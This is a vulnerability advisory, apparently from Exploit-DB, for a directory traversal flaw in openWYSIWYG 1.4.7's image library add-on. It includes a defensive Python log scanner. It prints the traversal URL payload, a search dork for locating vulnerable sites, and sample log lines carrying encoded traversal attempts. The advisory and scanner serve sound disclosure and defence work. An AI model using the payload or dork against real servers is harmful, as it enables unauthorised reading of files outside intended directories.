Vendor: openWYSIWYG
By: Juri Gianni aka yeat
CVSS: 7.5 (HIGH)
Type: Local Directory Traversal
CWE: 22
Product Name: openWYSIWYG
Affected Version From: 1.4.7
Affected Version To: 1.4.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:openwebware:openwysiwyg
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

openWYSIWYG <= 1.4.7 Local Directory Traversal Vulnerability

openWYSIWYG <= 1.4.7 contains a directory traversal vulnerability that lets an attacker reach directories outside of the intended directory. It is triggered by an HTTP request that passes a relative path in the dir parameter of the image library add-on, such as http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

Mitigation:

Upgrade to the latest version of openWYSIWYG
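
For defenders reviewing web server logs, the following added example (not part of the original advisory or of openWYSIWYG) flags requests to select_image.php whose dir value contains a parent-directory segment. The combined log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint and parameter named in the advisory.
ENDPOINT = "addons/imagelibrary/select_image.php"
PARAM = "dir"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Undo repeated percent-encoding until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_parent_segment(path):
    """True if any path segment is '..' once both slash styles are unified."""
    return ".." in path.replace("\\", "/").split("/")

def is_traversal_attempt(log_line):
    """Flag a log line requesting select_image.php with '..' in its dir value."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return False
    url = urlsplit(match.group(1))
    if not fully_decode(url.path).lower().endswith(ENDPOINT):
        return False
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM and has_parent_segment(fully_decode(value)):
            return True
    return False

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/May/2009:10:00:00 +0000] "GET /editor/addons/imagelibrary/select_image.php?dir=uploads/2009 HTTP/1.1" 200 512',
    '192.0.2.11 - - [11/May/2009:10:00:05 +0000] "GET /editor/addons/imagelibrary/select_image.php?dir=../../../ HTTP/1.1" 200 2048',
    '192.0.2.12 - - [11/May/2009:10:00:09 +0000] "GET /editor/addons/imagelibrary/select_image.php?dir=..%2F..%2F HTTP/1.1" 200 2048',
    '192.0.2.13 - - [11/May/2009:10:00:12 +0000] "GET /index.php?dir=../ HTTP/1.1" 200 100',
]

def scan(lines):
    """Return the lines that look like traversal attempts on the image library."""
    return [line for line in lines if is_traversal_attempt(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that such a request was made; whether it succeeded depends on the installed version.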

Exploit-DB raw data:

[--- openWYSIWYG <= 1.4.7 Local Directory Transversal Vulnerability ---]

[-- Discovered by Juri Gianni aka yeat - staker[at]hotmail[dot]it --]
[-- Visit http://zeroidentity.org --]
[-- allinurl: addons/imagelibrary/select_image.php --]

http://[target]/[path]/addons/imagelibrary/select_image.php?dir=../../../

# milw0rm.com [2009-05-11]